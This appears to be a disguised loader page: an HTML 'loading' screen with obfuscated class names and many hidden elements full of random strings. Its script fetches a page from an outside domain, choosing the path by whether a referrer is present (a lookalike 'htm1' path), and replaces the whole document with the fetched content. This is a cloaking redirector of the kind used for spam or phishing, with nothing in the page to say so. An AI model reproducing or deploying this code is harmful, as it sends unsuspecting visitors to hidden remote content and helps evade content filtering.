<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .L2GhdHQA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .L2GhdHQA .oUpEmYT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .L2GhdHQA .content {
            line-height: 50px;
            text-align: center
        }

        .L2GhdHQA .img {
            width: 100%
        }

        .L2GhdHQA .XacPJU40quj {
            text-align: center
        }

        .L2GhdHQA .XacPJU40quj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .L2GhdHQA .XacPJU40quj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .L2GhdHQA .XacPJU40quj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .L2GhdHQA .XacPJU40quj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .L2GhdHQA .XacPJU40quj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .L2GhdHQA .XacPJU40quj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .L2GhdHQA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bgLopHYgokf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lH1mbed = bgLopHYgokf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lH1mbed +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lH1mbed +".html?a=share";
		}
		
        BlKNJ1b8Z=url+"#"+new Date().getTime();
        BlKNJ1b8Z && function() {
            $.get(BlKNJ1b8Z, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>a6FsHVb6mR6BohiPhumL47q6QhuJcSVNZt3SHHAU40i</span>
<ul style='display:none' >JsiRvgPrFWGTcXWFcnQPlekRTssFXaLOPD</ul>
<span style='display:none'>a6FsHVb6mR6BohiPhumL47q6QhuJcSVNZt3SHHAU40i</span>
<ul style='display:none' >JsiRvgPrFWGTcXWFcnQPlekRTssFXaLOPD</ul><div class="L2GhdHQA">
    <div class="oUpEmYT">
        <div class="XacPJU40quj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >sGgtbi0khqxo26MUHZ0lCr3h4HtX8dvxyahYqKgHbTLy</li>
<ul style='display:none' >XpicZoUrQ2WsN2dekBNn4061zy0UmL4SXDEGNvS2sAyCkC9PbQ4zYWXihLb7NBdo8MkQ0K2kr5SMVmSjdKp0pgE3PTF</ul>
<p  style='display:none'>ZHjmVacthDXq0xcJRHIwQLdSxwLGvnm</p>
<ul style='display:none' >XpicZoUrQ2WsN2dekBNn4061zy0UmL4SXDEGNvS2sAyCkC9PbQ4zYWXihLb7NBdo8MkQ0K2kr5SMVmSjdKp0pgE3PTF</ul>
<div style='display:none'>b77rC0ZeIu2Do7WozSn82P4E3bSyH9Q77EPTmicotrCIN8oqEWW7Xm2bckKEUHCVCLCkkOQb</div>
<h1 style='display:none' >tNYi4X5Pbor2JlQk266jVNEIZactK1K7ROPTkEvbPUD</h1>
<div style='display:none'>b77rC0ZeIu2Do7WozSn82P4E3bSyH9Q77EPTmicotrCIN8oqEWW7Xm2bckKEUHCVCLCkkOQb</div>
<p  style='display:none'>ZHjmVacthDXq0xcJRHIwQLdSxwLGvnm</p>
<ul style='display:none' >XpicZoUrQ2WsN2dekBNn4061zy0UmL4SXDEGNvS2sAyCkC9PbQ4zYWXihLb7NBdo8MkQ0K2kr5SMVmSjdKp0pgE3PTF</ul></body>
</html>